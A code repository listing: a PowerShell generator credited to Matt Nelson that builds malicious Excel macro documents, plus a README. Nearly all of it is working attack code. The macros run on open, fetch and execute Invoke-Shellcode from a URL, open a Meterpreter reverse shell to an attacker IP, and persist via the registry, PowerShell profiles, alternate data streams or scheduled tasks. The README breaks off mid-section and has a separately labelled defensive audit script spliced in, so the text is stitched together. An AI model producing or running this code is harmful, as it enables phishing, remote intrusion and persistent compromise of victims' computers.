├── Generate-Macro.ps1
└── README.md

/Generate-Macro.ps1:
--------------------------------------------------------------------------------
#Coded by Matt Nelson (@enigma0x3)
<#
.SYNOPSIS
Standalone Powershell script that will generate a malicious Microsoft Office document with a specified payload and persistence method

.DESCRIPTION
This script will generate malicious Microsoft Excel Documents that contain VBA macros. This script will prompt you for your attacking IP
(the one you will receive your shell at), the port you want your shell at, and the name of the document. From there, the script will then
display a menu of different attacks, all with different persistence methods. Once an attack is chosen, it will then prompt you for your payload type
(Only HTTP and HTTPS are supported).

When naming the document, don't include a file extension.

These attacks use Invoke-Shellcode, which was created by Matt Graeber. Follow him on Twitter --> @mattifestation

PowerSploit Function: Invoke-Shellcode
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.Attack Types
Meterpreter Shell with Logon Persistence: This attack delivers a meterpreter shell and then persists in the registry
by creating a hidden .vbs file in C:\Users\Public and then creates a registry key in HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load
that executes the .vbs file on login.

Meterpreter Shell with Powershell Profile Persistence: This attack requires the target user to have admin rights but is quite creative. It will
deliver you a shell and then drop a malicious .vbs file in C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs. Once dropped, it creates
an infected Powershell Profile file in C:\Windows\SysNative\WindowsPowerShell\v1.0\ and then creates a registry key in
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load that executes Powershell.exe on startup. Since the Powershell profile loads automatically when
Powershell.exe is invoked, your code is executed automatically.

Meterpreter Shell with Alternate Data Stream Persistence: This attack will give you a shell and then persists by creating 2 alternate data streams attached to the AppData
folder. It then creates a registry key that parses the Alternate Data Streams and runs the Base64 encoded payload.

Meterpreter Shell with Scheduled Task Persistence: This attack will give you a shell and then persist by creating a scheduled task with the action set to
the set payload.

.EXAMPLE
PS> ./Generate-Macro.ps1
Enter IP Address: 10.0.0.10
Enter Port Number: 1111
Enter the name of the document (Do not include a file extension): FinancialData

--------Select Attack---------
1. Meterpreter Shell with Logon Persistence
2. Meterpreter Shell with Powershell Profile Persistence (Requires user to be local admin)
3. Meterpreter Shell with Alternate Data Stream Persistence
4. Meterpreter Shell with Scheduled Task Persistence
------------------------------
Select Attack Number & Press Enter: 1

--------Select Payload---------
1. Meterpreter Reverse HTTPS
2. Meterpreter Reverse HTTP
------------------------------
Select Payload Number & Press Enter: 1
Saved to file C:\Users\Malware\Desktop\FinancialData.xls
PS>

#>
$global:defLoc = "$env:userprofile\Desktop"
$global:IS_Url = Read-Host "Enter URL of Invoke-Shellcode script (If you use GitHub, use the raw version)"
$global:IP = Read-Host "Enter IP Address"
$global:Port = Read-Host "Enter Port Number"
$global:Name = Read-Host "Enter the name of the document (Do not include a file extension)"
$global:Name = $global:Name + ".xls"
$global:FullName = "$global:defLoc\$global:Name"

function Registry-Persistence {
<#
.SYNOPSIS
Uses registry to persist after reboot
.DESCRIPTION
Drops a hidden VBS file and creates a registry key to execute it on startup
#>
#create macro

$Code = @"
Sub Auto_Open()
Execute
Persist
Reg
Start

End Sub

Public Function Execute() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('$global:IS_Url')); Invoke-Shellcode -Payload $Payload -Lhost $global:IP -Lport $global:Port -Force", Null, objConfig, intProcessID
End Function

Public Function Persist() As Variant
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:\Users\Public\config.txt", True)
a.WriteLine ("Dim objShell")
a.WriteLine ("Set objShell = WScript.CreateObject(""WScript.Shell"")")
a.WriteLine ("command = ""C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('$global:IS_Url')); Invoke-Shellcode -Payload $Payload -Lhost $global:IP -Lport $global:Port -Force""")
a.WriteLine ("objShell.Run command,0")
a.WriteLine ("Set objShell = Nothing")
a.Close
GivenLocation = "C:\Users\Public\"
OldFileName = "config.txt"
NewFileName = "config.vbs"
Name GivenLocation & OldFileName As GivenLocation & NewFileName
SetAttr "C:\Users\Public\config.vbs", vbHidden
End Function

Public Function Reg() As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load", "C:\Users\Public\config.vbs", "REG_SZ"
Set WshShell = Nothing

End Function

Public Function Start() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Shell "wscript C:\Users\Public\config.vbs", vbNormalFocus

End Function
"@

#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version

#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null

$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)

$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)

#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"

#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}

#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null

#Create Clean-up Script
New-Item $env:userprofile\Desktop\RegistryCleanup.ps1 -type file | Out-Null
$RegistryCleanup = @'
if(Test-Path "C:\Users\Public\config.vbs"){
try{
Remove-Item "C:\Users\Public\config.vbs" -Force
Write-Host "[*]Successfully Removed config.vbs from C:\Users\Public"}catch{Write-Host "[!]Unable to remove config.vbs from C:\Users\Public"}
}else{Write-Host "[!]Path not valid"}
$Reg = "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows"
$RegQuery = Get-ItemProperty $Reg | Select-Object "Load"
if($RegQuery.Load -eq "C:\Users\Public\config.vbs"){
try{
Remove-ItemProperty -Path $Reg -Name "Load"
Write-Host "[*]Successfully Removed Malicious Load entry from HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows"}catch{Write-Host "[!]Unable to remove Registry Entry"}
}else{Write-Host "[!]Path not valid"}
'@
Add-Content $env:userprofile\Desktop\RegistryCleanup.ps1 $RegistryCleanup
Write-Host "Clean-up Script located at $env:userprofile\Desktop\RegistryCleanup.ps1"

}

function PowerShellProfile-Persistence{

$Code = @"
'Coded by Matt Nelson
'twitter.com/enigma0x3
'enigma0x3.wordpress.com

Sub Auto_Open()

Execute
WriteWrapper
WriteProfile
Reg

End Sub

Public Function Execute() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('$global:IS_Url')); Invoke-Shellcode -Payload $Payload -Lhost $global:IP -Lport $global:Port -Force", Null, objConfig, intProcessID
End Function

Public Function WriteWrapper() As Variant
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.txt", True)
a.WriteLine ("Dim objShell")
a.WriteLine ("Set objShell = WScript.CreateObject(""WScript.Shell"")")
a.WriteLine ("command = ""C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe""")
a.WriteLine ("objShell.Run command,0")
a.WriteLine ("Set objShell = Nothing")
a.Close
GivenLocation = "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\"
OldFileName = "cookie.txt"
NewFileName = "cookie.vbs"
Name GivenLocation & OldFileName As GivenLocation & NewFileName
SetAttr "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs", vbHidden

End Function

Public Function WriteProfile() As Variant
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:\Windows\SysNative\WindowsPowerShell\v1.0\Profile.txt", True)
a.WriteLine ("IEX ((New-Object Net.WebClient).DownloadString('$global:IS_Url')); Invoke-Shellcode -Payload $Payload -Lhost $global:IP -Lport $global:Port -Force")
a.Close
GivenLocation = "C:\Windows\SysNative\WindowsPowerShell\v1.0\"
OldFileName = "Profile.txt"
NewFileName = "Profile.ps1"
Name GivenLocation & OldFileName As GivenLocation & NewFileName
SetAttr "C:\Windows\SysNative\WindowsPowerShell\v1.0\Profile.ps1", vbHidden
End Function

Public Function Reg() As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load", "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs", "REG_SZ"
Set WshShell = Nothing

End Function

"@

#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version

#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null

$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)

$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)

#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"

#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}

#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null

#Create Clean-up Script
New-Item $env:userprofile\Desktop\PowerShellProfileCleanup.ps1 -type file | Out-Null
$PowerShellProfileCleanup = @'
if(Test-Path "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs"){
try{
Remove-Item "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs" -Force
Write-Host "[*]Successfully Removed cookie.vbs from C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies"}catch{Write-Host "[!]Unable to remove cookie.vbs from C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies"}
}else{Write-Host "[!]Path not valid"}
if(Test-Path "C:\Windows\System32\WindowsPowerShell\v1.0\Profile.ps1"){
try{
Remove-Item "C:\Windows\System32\WindowsPowerShell\v1.0\Profile.ps1" -Force
Write-Host "[*]Successfully Removed Profile.ps1 from C:\Windows\System32\WindowsPowerShell\v1.0"}catch{Write-Host "[!]Unable to remove Profile.ps1 from C:\Windows\System32\WindowsPowerShell\v1.0"}
}else{Write-Host "[!]Path not valid"}
$Reg = "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows"
$RegQuery = Get-ItemProperty $Reg | Select-Object "Load"
if($RegQuery.Load -eq "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs"){
try{
Remove-ItemProperty -Path $Reg -Name "Load"
Write-Host "[*]Successfully Removed Malicious Load entry from HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows"}catch{Write-Host "[!]Unable to remove Registry Entry"}
}else{Write-Host "[!]Path not valid"}
'@
Add-Content $env:userprofile\Desktop\PowerShellProfileCleanup.ps1 $PowerShellProfileCleanup
Write-Host "Clean-up Script located at $env:userprofile\Desktop\PowerShellProfileCleanup.ps1"
}

function SchTaskPersistence{
$TimeDelay = Read-Host "Enter User Idle Time before the task runs"
$TaskName = Read-Host "Enter the name you want the task to be called"
$Code = @"
'Coded by Matt Nelson
'twitter.com/enigma0x3
'enigma0x3.wordpress.com

Sub Auto_Open()

Execute
Persist

End Sub

Public Function Execute() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('$global:IS_Url')); Invoke-Shellcode -Payload $Payload -Lhost $global:IP -Lport $global:Port -Force", Null, objConfig, intProcessID
End Function

Public Function Persist() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "Powershell.exe -WindowStyle Hidden -nop -noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN $TaskName /TR 'powershell.exe -WindowStyle hidden -noexit -c ''IEX ((New-Object Net.WebClient).DownloadString(''''$global:IS_Url''''''))''; Invoke-Shellcode -Payload $Payload -Lhost $global:IP -Lport $global:Port -Force' /SC onidle /i $TimeDelay}", Null, objConfig, intProcessID
End Function

"@

#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version

#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null

$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)

$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)

#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"

#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null

#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null

#Create Clean-up Script
New-Item $env:userprofile\Desktop\SchTaskCleanup.ps1 -type file | Out-Null
$SchTaskCleanup = @"
`$TaskName = "$TaskName"
`$CheckTask = SCHTASKS /QUERY /TN $TaskName
try{
SCHTASKS /Delete /TN $TaskName /F
}catch{Write-Host "[!]Unable to remove malicious task named $TaskName"}
"@
Add-Content $env:userprofile\Desktop\SchTaskCleanup.ps1 $SchTaskCleanup
Write-Host "Clean-up Script located at $env:userprofile\Desktop\SchTaskCleanup.ps1"
}

function AltDS-Persistence{
$AltDSURL = Read-Host "Enter URL of hosted Alternate Data Stream Persistence Script"

$Code = @"
'Coded by Matt Nelson
'twitter.com/enigma0x3
'enigma0x3.wordpress.com

Sub Auto_Open()

Execute
ADSPersist

End Sub

Public Function Execute() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('$global:IS_Url')); Invoke-Shellcode -Payload $Payload -Lhost $global:IP -Lport $global:Port -Force", Null, objConfig, intProcessID
End Function

Public Function ADSPersist() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('$AltDSURL')); Invoke-ADSBackdoor -URL $global:IS_Url -Arguments 'Invoke-Shellcode -Payload $Payload -LHost $global:IP -LPort $global:Port -Force'", Null, objConfig, intProcessID
End Function

"@

#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version

#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null

$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)

$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)

#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"

#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}

#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null

#Create Clean-up Script
New-Item $env:userprofile\Desktop\AltDSCleanup.ps1 -type file | Out-Null
$AltDSCleanup = @'
function Remove-ADS {
<#
.SYNOPSIS
Removes an alternate data stream from a specified location.
P/Invoke code adapted from PowerSploit's Mayhem.psm1 module.

Author: @harmj0y, @mattifestation
License: BSD 3-Clause

.LINK
https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1

#>
[CmdletBinding()] Param(
[Parameter(Mandatory=$True)]
[string]$ADSPath
)

#region define P/Invoke types dynamically
# stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)

$TypeBuilder = $ModuleBuilder.DefineType('Win32.Kernel32', 'Public, Class')
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor,
@('kernel32.dll'),
[Reflection.FieldInfo[]]@($SetLastError),
@($True))

# Define [Win32.Kernel32]::DeleteFile
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('DeleteFile',
'kernel32.dll',
([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),
[Reflection.CallingConventions]::Standard,
[Bool],
[Type[]]@([String]),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Ansi)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)

$Kernel32 = $TypeBuilder.CreateType()

$Result = $Kernel32::DeleteFile($ADSPath)

if ($Result){
Write-Verbose "Alternate Data Stream at $ADSPath successfully removed."
}
else{
Write-Verbose "Alternate Data Stream at $ADSPath removal failure!"
}

$Result
}

function Remove-ADSBackdoor {
<#
.SYNOPSIS
Removes the backdoor installed by Invoke-ADSBackdoor.

.DESCRIPTION
This function will remove the persistence installed by Invoke-ADSBackdoor by parsing
the run registry run key, removing the alternate data stream files, and then
removing the registry key.
#>

# get the VBS trigger command/file location from the registry
$trigger = (gp HKCU:\Software\Microsoft\Windows\CurrentVersion\Run Update).Update
$vbsFile = $trigger.split(" ")[1]
$getWrapperADS = {cmd /C "more < $vbsFile"}
$wrapper = Invoke-Command -ScriptBlock $getWrapperADS

if ($wrapper -match 'i in \((.+?)\)')
{
# extract out the payload .txt file location
$textFile = $matches[1]
if($( Remove-ADS $textFile)){
"Successfully removed payload file $textFile"
}
else{
"[!] Error in removing payload file $textFile"
}

}
else{
"[!] Error: couldn't extract PowerShell script location from VBS wrapper $vbsFile"
}

if($(Remove-ADS $vbsFile)){
"Successfully removed wrapper file $vbsFile"
}
else{
"[!] Error in removing payload file $textFile"
}

# remove the registry run key
Remove-ItemProperty -Force -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update;
"Successfully removed Malicious Update entry from HKCU:Software\Microsoft\Windows\CurrentVersion\Run"
}
Remove-ADSBackdoor
'@
Add-Content $env:userprofile\Desktop\AltDSCleanup.ps1 $AltDSCleanup
Write-Host "Clean-up Script located at $env:userprofile\Desktop\AltDSCleanup.ps1"
}

#Determine Attack
Do {
Write-Host "
--------Select Attack---------
1. Meterpreter Shell with Logon Persistence
2. Meterpreter Shell with Powershell Profile Persistence (Requires user to be local admin)
3. Meterpreter Shell with Alternate Data Stream Persistence
4. Meterpreter Shell with Scheduled Task Persistence
------------------------------"
$AttackNum = Read-Host -prompt "Select Attack Number & Press Enter"
} until ($AttackNum -eq "1" -or $AttackNum -eq "2" -or $AttackNum -eq "3" -or $AttackNum -eq "4")

#Determine payload
Do {
Write-Host "
--------Select Payload---------
1. Meterpreter Reverse HTTPS
2. Meterpreter Reverse HTTP
------------------------------"
$PayloadNum = Read-Host -prompt "Select Payload Number & Press Enter"
} until ($PayloadNum -eq "1" -or $PayloadNum -eq "2")

if($PayloadNum -eq "1"){
$Payload = "windows/meterpreter/reverse_https"}
elseif($PayloadNum -eq "2"){
$Payload = "windows/meterpreter/reverse_http"}

#Initiate Attack Choice

if($AttackNum -eq "1"){
Registry-Persistence}
elseif($AttackNum -eq "2"){
PowerShellProfile-Persistence
}
elseif($AttackNum -eq "3"){
AltDS-Persistence
}
elseif($AttackNum -eq "4"){
SchTaskPersistence
}
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
Coded by Matt Nelson (@enigma0x3)

## SYNOPSIS

Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method.

[!] This script will temporarily disable 2 macro security settings while creating the document.
[!] The idea is to generate your malicious document on a development box you OWN and use that document to send to a target.

## DESCRIPTION

This script will generate malicious Microsoft Excel Documents that contain VBA macros.
This script will prompt you for an IP address and port (you will receive your shell at this address and port) and the name of the malicious document. From there, the script will then prompt you to choose from a menu of different attacks, all with different persistence methods. Once an attack is chosen, it will then prompt you for your payload type. Currently, only HTTP and HTTPS are supported.

When naming the document, do not include a file extension.

These attacks use Invoke-Shellcode, which was created by Matt Graeber. Follow him on Twitter --> @mattifestation
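The following audit script is an added defensive example, not part of Generate-Macro or its repository: it checks a Windows host for the footprint the four persistence methods and the two macro security settings described above leave behind. Every path, registry value and trigger type is taken from the script and its bundled clean-up routines; the function name, the keyword pattern and the "Update" Run value name (which the ADS clean-up script keys on) are assumptions of this example.

```powershell
function Test-GenerateMacroArtifacts {
    [CmdletBinding()]
    param()

    $findings = New-Object System.Collections.Generic.List[object]
    # Assumed keywords: the cradles written by the macros all contain one of these.
    $netPattern = 'DownloadString|Invoke-Shellcode|Invoke-ADSBackdoor'

    # 1. Logon and profile persistence both set HKCU\...\Windows\Load, a value
    #    that is normally absent on a workstation.
    $winKey = 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows'
    $load = (Get-ItemProperty -Path $winKey -Name Load -ErrorAction SilentlyContinue).Load
    if ($load) { $findings.Add([pscustomobject]@{ Check = 'Windows\Load value set'; Detail = $load }) }

    # 2. Hidden VBS wrappers at the two documented drop locations.
    foreach ($p in 'C:\Users\Public\config.vbs',
                   'C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs') {
        if (Test-Path -LiteralPath $p) {
            $attr = (Get-Item -LiteralPath $p -Force).Attributes
            $findings.Add([pscustomobject]@{ Check = 'VBS wrapper present'; Detail = "$p [$attr]" })
        }
    }

    # 3. AllUsers profile under System32 (the macro writes it via the SysNative
    #    alias) that pulls and runs remote code every time powershell.exe starts.
    $prof = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0\Profile.ps1'
    if (Test-Path -LiteralPath $prof) {
        $body = Get-Content -LiteralPath $prof -Raw -ErrorAction SilentlyContinue
        if ($body -match $netPattern) {
            $findings.Add([pscustomobject]@{ Check = 'AllUsers profile runs remote code'; Detail = $prof })
        }
    }

    # 4. ADS persistence: the clean-up script removes an HKCU Run value named
    #    "Update", so report it if present (assumed name, taken from that script).
    $runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    $upd = (Get-ItemProperty -Path $runKey -Name Update -ErrorAction SilentlyContinue).Update
    if ($upd) { $findings.Add([pscustomobject]@{ Check = 'Run\Update value set'; Detail = $upd }) }

    # 5. Scheduled task created with "/SC onidle" whose action launches
    #    powershell.exe with a download cradle.
    if (Get-Command Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
            $cmd  = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' '
            $idle = $task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskIdleTrigger' }
            if ($idle -and $cmd -match 'powershell' -and $cmd -match $netPattern) {
                $findings.Add([pscustomobject]@{ Check = 'Idle-triggered PowerShell task'; Detail = "$($task.TaskName): $cmd" })
            }
        }
    }

    # 6. Excel macro security. The generator sets AccessVBOM and VBAWarnings to 1
    #    (trust the VBA object model / enable all macros) and is meant to reset
    #    them to 0 afterwards; a 1 left behind means macros run without a prompt.
    Get-ChildItem 'HKCU:\Software\Microsoft\Office' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^\d+\.\d+$' } |
        ForEach-Object {
            $sec = Join-Path $_.PSPath 'Excel\Security'
            $val = Get-ItemProperty -Path $sec -ErrorAction SilentlyContinue
            foreach ($name in 'AccessVBOM', 'VBAWarnings') {
                if ($val.$name -eq 1) {
                    $findings.Add([pscustomobject]@{ Check = "Excel $name = 1"; Detail = $sec })
                }
            }
        }

    return $findings
}

Test-GenerateMacroArtifacts | Format-Table -AutoSize
```

Run it in the context of the user whose profile is being inspected; check 6 can also be pushed through policy by setting VBAWarnings to 4 (disable all macros without notification), which is the setting these documents need to be absent to run.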

## ATTACK TYPES